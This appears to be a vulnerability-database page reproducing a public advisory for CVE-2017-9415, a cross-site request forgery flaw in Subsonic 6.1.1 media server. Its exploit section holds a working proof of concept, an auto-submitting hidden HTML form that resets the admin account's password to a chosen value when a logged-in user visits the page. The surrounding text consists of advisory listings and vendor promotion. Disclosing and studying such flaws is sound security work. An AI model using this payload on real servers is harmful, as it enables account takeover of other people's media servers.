| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Subsonic Password Reset Vulnerability | 7 Jun 201700:00 | – | cnvd | |
| CVE-2017-9415 | 21 Jul 201714:00 | – | cve | |
| CVE-2017-9415 | 21 Jul 201714:00 | – | cvelist | |
| Subsonic 6.1.1 - Cross-Site Request Forgery | 5 Jun 201700:00 | – | exploitdb | |
| EUVD-2017-18350 | 7 Oct 202500:30 | – | euvd | |
| Subsonic 6.1.1 - Cross-Site Request Forgery | 5 Jun 201700:00 | – | exploitpack | |
| CVE-2017-9415 | 21 Jul 201714:29 | – | nvd | |
| CVE-2017-9415 | 21 Jul 201714:29 | – | osv | |
| Subsonic 6.1.1 Password Reset Cross Site Request Forgery | 3 Jun 201700:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 21 Jul 201714:29 | – | prion |
[+] Credits: John Page a.k.a hyp3rlinx
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
=====================
CSRF - Password Reset
CVE Reference:
==============
CVE-2017-9415
Security Issue:
================
Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
or visits an attacker controlled webpage. However, username must be known or guessed.
Exploit/POC:
=============
<form action="http://localhost:4040/userSettings.view" method="POST">
<input type="hidden" name="username" value="admin">
<input type="hidden" name="transcodeSchemeName" value="OFF">
<input name="passwordChange" type="hidden" value="true"/>
<input type="hidden" name="_passwordChange" value="on"/>
<input name="password" type="hidden" value="xyz123"/>
<input name="confirmPassword" type="hidden" value="xyz123"/>
<input name="email" type="hidden" value=""/>
<script>document.forms[0].submit()</script>
</form>
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation